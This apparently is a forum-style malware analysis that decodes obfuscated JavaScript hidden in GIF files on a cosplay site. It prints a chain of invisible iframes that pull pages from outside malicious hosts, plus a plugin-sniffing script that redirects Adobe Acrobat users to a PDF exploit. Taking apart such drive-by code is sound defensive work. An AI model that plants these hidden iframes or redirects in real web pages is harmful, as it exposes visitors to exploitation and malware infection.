The code in imgratemycosplay_com.gif Decodes to;
document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,100,97,115,114,101,116,111,107,102,105,110,46,99,111,109,47,105,110,100,101,120,46,112,104,112,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,62,60,47,105,102,114,97,109,101,62));
Which decodes to;
<iframe src="http://dasretokfin.com/index.php" width="0" height="0" style="display:none;"></iframe>
Which contains yet more encoded JS that leads to a fake codec.
The code in imgratemycosplay_com-2.gif decodes to;
window.status='Done';document.write('<iframe name=282620 src="http://8speed.org/t/?'+Math.round(Math.random()*12002)+'282620'+'" width=353 height=34 style="display:none"></iframe>')
Which loads;
<iframe name=9619574bea1 src='http://sexbases.cn/in.cgi?16&cc5f86' width=106 height=52 frameborder='0'></iframe>
Which loads (changed html to hxml to prevent problems with BBCode breakout);
<hxml><frameset rows="100%"><frame src="http://sexbases.cn/edit.html"></frameset></hxml>
Which loads;
<iframe src=http://firstgate.ru/33/tr.php width=1 height=1 style="display:none"></iframe>
<iframe src=http://sexbases.cn/gr.php width=1 height=1 style="display:none"></iframe>
firstgate.ru loads a PDF exploit and sexbases.cn loads;
<iframe src=http://peskufex.cn/ss/in.cgi?9 width=1 height=1 style="display:none"></iframe>
Which loads another PDF exploit, courtesy of;
function PDF()
{
for (var i=0;i<navigator.plugins.length;i++) {
var name = navigator.plugins[i].name;
if (name.indexOf("Adobe Acrobat") != -1) {
location.href = "spl/pdf.pdf";
}
}
}
PDF();
The code in imgratemycosplay_com-3.gif decodes to;
window.status='Done';document.write('<iframe name=c5642 src="http://8speed.org/t/?'+Math.round(Math.random()*15808)+'c5642'+'" width=208 height=76 style="display:none"></iframe>')
Which is the same as imgratemycosplay_com-2.gif